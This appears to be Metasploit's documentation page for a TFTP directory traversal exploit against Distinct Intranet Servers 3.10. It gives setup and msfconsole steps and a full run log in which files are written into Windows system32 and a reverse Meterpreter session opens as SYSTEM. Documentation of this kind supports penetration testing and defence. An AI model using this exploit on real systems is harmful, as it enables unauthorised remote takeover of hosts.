CoCalc -- distinct_tftp

CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!

GitHub Repository: rapid7/metasploit-framework
Path: blob/master/documentation/modules/exploit/windows/tftp/distinct_tftp_traversal.md
Views: ¹⁹⁰⁴

Vulnerable Application

This module exploits a directory traversal vulnerability in the TFTP Server component of Distinct Intranet Servers version 3.10 which allows a remote attacker to write arbitrary files to the server file system, resulting in code execution under the context of 'SYSTEM'. This module has been tested successfully on TFTP Server version 3.10 on Windows XP SP3 (EN).

Download:

https://www.exploit-db.com/apps/00064d0e83691e64ec1b1f8f25627010-Intranet-Servers-310-Setup.exe

Verification Steps

Setup:

Install Distinct Intranet Servers
Launch TFTP Server
Select Configure -> TFTP from the application menu
Set the root directory to C:\\some\\path
Check Enable TFTP Server
Press OK to apply settings

Exploitation:

Start msfconsole
use exploit/windows/tftp/distinct_tftp_traversal
set RHOSTS <rhost>
set DEPTH 10
run
You should receive a session

Options

DEPTH

Levels to reach base directory. (Default: 10)

Scenarios

Microsoft Windows XP SP3 (EN)

msf5 > use exploit/windows/tftp/distinct_tftp_traversal 
msf5 exploit(windows/tftp/distinct_tftp_traversal) > set rhosts 172.16.191.205
rhosts => 172.16.191.205
msf5 exploit(windows/tftp/distinct_tftp_traversal) > run

[*] Started reverse TCP handler on 172.16.191.165:4444 
[*] Sending EXE (73802 bytes)
[*] Started TFTP client listener on 0.0.0.0:6867
[*] Listening for incoming ACKs
[*] WRQ accepted, sending the file.
[*] Source file: (Data), destination file: ../../../../../../../../../../\WINDOWS\system32\kRzdfnrUu.exe
[*] Sending 73802 bytes (145 blocks)
[*] Sent 512 bytes in block 1
[*] Sent 512 bytes in block 2
[*] Sent 512 bytes in block 3
[*] Sent 512 bytes in block 4
[*] Sent 512 bytes in block 5
[*] Sent 512 bytes in block 6
[*] Sent 512 bytes in block 7
[*] Sent 512 bytes in block 8
[*] Sent 512 bytes in block 9
[*] Sent 512 bytes in block 10
[*] Sent 512 bytes in block 11
[*] Sent 512 bytes in block 12
[*] Sent 512 bytes in block 13
[*] Sent 512 bytes in block 14
[*] Sent 512 bytes in block 15
[*] Sent 512 bytes in block 16
[*] Sent 512 bytes in block 17
[*] Sent 512 bytes in block 18
[*] Sent 512 bytes in block 19
[*] Sent 512 bytes in block 20
[*] Sent 512 bytes in block 21
[*] Sent 512 bytes in block 22
[*] Sent 512 bytes in block 23
[*] Sent 512 bytes in block 24
[*] Sent 512 bytes in block 25
[*] Sent 512 bytes in block 26
[*] Sent 512 bytes in block 27
[*] Sent 512 bytes in block 28
[*] Sent 512 bytes in block 29
[*] Sent 512 bytes in block 30
[*] Sent 512 bytes in block 31
[*] Sent 512 bytes in block 32
[*] Sent 512 bytes in block 33
[*] Sent 512 bytes in block 34
[*] Sent 512 bytes in block 35
[*] Sent 512 bytes in block 36
[*] Sent 512 bytes in block 37
[*] Sent 512 bytes in block 38
[*] Sent 512 bytes in block 39
[*] Sent 512 bytes in block 40
[*] Sent 512 bytes in block 41
[*] Sent 512 bytes in block 42
[*] Sent 512 bytes in block 43
[*] Sent 512 bytes in block 44
[*] Sent 512 bytes in block 45
[*] Sent 512 bytes in block 46
[*] Sent 512 bytes in block 47
[*] Sent 512 bytes in block 48
[*] Sent 512 bytes in block 49
[*] Sent 512 bytes in block 50
[*] Sent 512 bytes in block 51
[*] Sent 512 bytes in block 52
[*] Sent 512 bytes in block 53
[*] Sent 512 bytes in block 54
[*] Sent 512 bytes in block 55
[*] Sent 512 bytes in block 56
[*] Sent 512 bytes in block 57
[*] Sent 512 bytes in block 58
[*] Sent 512 bytes in block 59
[*] Sent 512 bytes in block 60
[*] Sent 512 bytes in block 61
[*] Sent 512 bytes in block 62
[*] Sent 512 bytes in block 63
[*] Sent 512 bytes in block 64
[*] Sent 512 bytes in block 65
[*] Sent 512 bytes in block 66
[*] Sent 512 bytes in block 67
[*] Sent 512 bytes in block 68
[*] Sent 512 bytes in block 69
[*] Sent 512 bytes in block 70
[*] Sent 512 bytes in block 71
[*] Sent 512 bytes in block 72
[*] Sent 512 bytes in block 73
[*] Sent 512 bytes in block 74
[*] Sent 512 bytes in block 75
[*] Sent 512 bytes in block 76
[*] Sent 512 bytes in block 77
[*] Sent 512 bytes in block 78
[*] Sent 512 bytes in block 79
[*] Sent 512 bytes in block 80
[*] Sent 512 bytes in block 81
[*] Sent 512 bytes in block 82
[*] Sent 512 bytes in block 83
[*] Sent 512 bytes in block 84
[*] Sent 512 bytes in block 85
[*] Sent 512 bytes in block 86
[*] Sent 512 bytes in block 87
[*] Sent 512 bytes in block 88
[*] Sent 512 bytes in block 89
[*] Sent 512 bytes in block 90
[*] Sent 512 bytes in block 91
[*] Sent 512 bytes in block 92
[*] Sent 512 bytes in block 93
[*] Sent 512 bytes in block 94
[*] Sent 512 bytes in block 95
[*] Sent 512 bytes in block 96
[*] Sent 512 bytes in block 97
[*] Sent 512 bytes in block 98
[*] Sent 512 bytes in block 99
[*] Sent 512 bytes in block 100
[*] Sent 512 bytes in block 101
[*] Sent 512 bytes in block 102
[*] Sent 512 bytes in block 103
[*] Sent 512 bytes in block 104
[*] Sent 512 bytes in block 105
[*] Sent 512 bytes in block 106
[*] Sent 512 bytes in block 107
[*] Sent 512 bytes in block 108
[*] Sent 512 bytes in block 109
[*] Sent 512 bytes in block 110
[*] Sent 512 bytes in block 111
[*] Sent 512 bytes in block 112
[*] Sent 512 bytes in block 113
[*] Sent 512 bytes in block 114
[*] Sent 512 bytes in block 115
[*] Sent 512 bytes in block 116
[*] Sent 512 bytes in block 117
[*] Sent 512 bytes in block 118
[*] Sent 512 bytes in block 119
[*] Sent 512 bytes in block 120
[*] Sent 512 bytes in block 121
[*] Sent 512 bytes in block 122
[*] Sent 512 bytes in block 123
[*] Sent 512 bytes in block 124
[*] Sent 512 bytes in block 125
[*] Sent 512 bytes in block 126
[*] Sent 512 bytes in block 127
[*] Sent 512 bytes in block 128
[*] Sent 512 bytes in block 129
[*] Sent 512 bytes in block 130
[*] Sent 512 bytes in block 131
[*] Sent 512 bytes in block 132
[*] Sent 512 bytes in block 133
[*] Sent 512 bytes in block 134
[*] Sent 512 bytes in block 135
[*] Sent 512 bytes in block 136
[*] Sent 512 bytes in block 137
[*] Sent 512 bytes in block 138
[*] Sent 512 bytes in block 139
[*] Sent 512 bytes in block 140
[*] Sent 512 bytes in block 141
[*] Sent 512 bytes in block 142
[*] Sent 512 bytes in block 143
[*] Sent 512 bytes in block 144
[*] Sent 74 bytes in block 145
[*] Transferred 73802 bytes in 145 blocks, upload complete!
[*] Sending MOF (2221 bytes)
[*] Started TFTP client listener on 0.0.0.0:59069
[*] Listening for incoming ACKs
[*] WRQ accepted, sending the file.
[*] Source file: (Data), destination file: ../../../../../../../../../../\WINDOWS\system32\wbem\mof\OEEXjgTIL.mof
[*] Sending 2221 bytes (5 blocks)
[*] Sent 512 bytes in block 1
[*] Sent 512 bytes in block 2
[*] Sent 512 bytes in block 3
[*] Sent 512 bytes in block 4
[*] Sent 173 bytes in block 5
[*] Transferred 2221 bytes in 5 blocks, upload complete!
[*] Sending stage (176195 bytes) to 172.16.191.205
[*] Meterpreter session 1 opened (172.16.191.165:4444 -> 172.16.191.205:1247) at 2020-05-14 00:43:03 -0400
[!] This exploit may require manual cleanup of 'kRzdfnrUu.exe' on the target
[!] This exploit may require manual cleanup of 'wbem\mof\good\OEEXjgTIL.mof' on the target

meterpreter > 
[+] Deleted wbem\mof\good\OEEXjgTIL.mof

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >